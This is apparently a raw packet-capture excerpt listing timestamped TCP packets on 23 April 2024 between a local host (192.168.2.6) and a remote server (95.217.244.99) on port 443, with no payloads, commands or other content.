Apr 23, 2024 21:44:04.921991110 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.945914984 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.945965052 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.946194887 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.946213961 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.946337938 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.968060970 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.968082905 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.968178988 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.968188047 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.968255997 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.991677046 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.991708040 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.991852999 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:04.991866112 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:04.991914988 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.010682106 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.010703087 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.010776043 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.010786057 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.010912895 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.031848907 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.031872034 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.031949043 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.031965971 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.032023907 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.049257040 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.049290895 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.049412966 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.049426079 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.049565077 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.068556070 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.068586111 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.068919897 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.068933964 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.069072008 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.084409952 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.084436893 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.092154026 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.092165947 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.092855930 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.099752903 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.099764109 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.099858999 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.099879980 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.099948883 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.117059946 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.117094040 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.117218018 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.117228985 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.117302895 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.131403923 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.131439924 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.131542921 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.131542921 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.131558895 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.131618977 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.147474051 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.147500992 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.148148060 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.148160934 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.150649071 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.161921024 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.161948919 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.162033081 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.162045956 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.162084103 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.174741983 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.174767017 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.176017046 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.176033020 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.176234961 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.189095020 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.189120054 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.189297915 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.189306021 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.189343929 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.201064110 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.201086044 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.202656031 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.202667952 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.203995943 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.213263035 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.213288069 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.213368893 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.213382006 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.213426113 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.224263906 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.224294901 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.224364996 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.224376917 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.224411964 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.236494064 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.236532927 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.236579895 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.236596107 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.236638069 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.236638069 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.246577978 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.246612072 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.246848106 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.246856928 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.247275114 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.257086039 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.257117033 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.257250071 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.257265091 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.258651972 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.266458035 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.266493082 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.266608000 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.266608000 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.266625881 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.270021915 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.277021885 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.277065992 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.277148962 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.277162075 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.277982950 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.285692930 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.285738945 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.286655903 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.286667109 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.287662983 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.294910908 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.294928074 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.295186043 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.295201063 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.295269012 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.304733992 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.304769993 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.305476904 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.305494070 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.305856943 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.312303066 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.312338114 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.312436104 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.312449932 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.312570095 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.321228027 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.321263075 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.321552992 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.321564913 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.321630955 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.328320026 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.328341961 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.328408003 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.328417063 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.328449965 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.328504086 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.336523056 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.336548090 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.336661100 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.336672068 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.336745977 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.343718052 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.343791008 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.343858957 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.343866110 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.344078064 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.351649046 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.351680994 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.351773977 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.351782084 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.351939917 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.358931065 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.358954906 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.359055042 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.359055042 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.359066963 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.359138966 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.365510941 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.365542889 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.365655899 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.365664959 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.365758896 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.373038054 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.373060942 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.373164892 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.373172998 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.373225927 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.379355907 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.379379034 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.379533052 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.379550934 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.379592896 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.386101961 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.386135101 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.386253119 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.386253119 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.386261940 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.386471987 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.392370939 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.392404079 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.392488003 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.392488003 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.392496109 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.392636061 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.399260998 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.399301052 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.399370909 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.399377108 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.399393082 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.399472952 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.405109882 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.405136108 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.405194998 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.405203104 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.405232906 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.405263901 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.411571026 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.411634922 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.411710978 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.411710978 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.411724091 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.412060976 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.418075085 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.418104887 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.418205976 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.418205976 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.418217897 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.418648005 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.423628092 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.423650026 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.423835039 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.423850060 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.424134970 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.429395914 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.429430008 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.429527044 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.429527044 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.429537058 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.429698944 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.435169935 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.435218096 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.435246944 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.435266018 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.435298920 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.435298920 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.441616058 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.441682100 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.441695929 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.441776037 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.441816092 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.441816092 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.446562052 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.446588993 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.446623087 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.446635008 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.446676016 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.446676016 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.452893972 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.452914000 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.452970982 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.453089952 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.453095913 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.453219891 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.459245920 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.459275007 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.459331989 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.459347963 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.459667921 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.464010000 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.464030027 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.464107037 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.464123011 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.464266062 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.469120026 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.469139099 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.469300985 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.469309092 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.469458103 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.475512028 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.475529909 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.475603104 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.475616932 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.476010084 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.480468035 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.480488062 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.480561972 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.480578899 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.480737925 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.485274076 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.485301971 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.485836029 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.485846043 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.486037016 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.490973949 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.490998030 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.491079092 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.491095066 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.491565943 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.495579004 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.495601892 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.495666027 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.495682955 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.495873928 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.500722885 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.500744104 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.501214981 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.501221895 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.501363039 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.505135059 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.505153894 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.505214930 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.505225897 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.505600929 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.510868073 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.510886908 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.510968924 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.510982990 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.511131048 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.515188932 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.515208960 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.515252113 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.515265942 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.515296936 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.515296936 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.519823074 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.519874096 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.519916058 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.519928932 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.519978046 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.519978046 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.524821043 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.524852037 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.524939060 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.524939060 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.524945021 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.525156975 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.528975964 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.529000998 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.529113054 CEST	49713	443	192.168.2.6	95.217.244.99
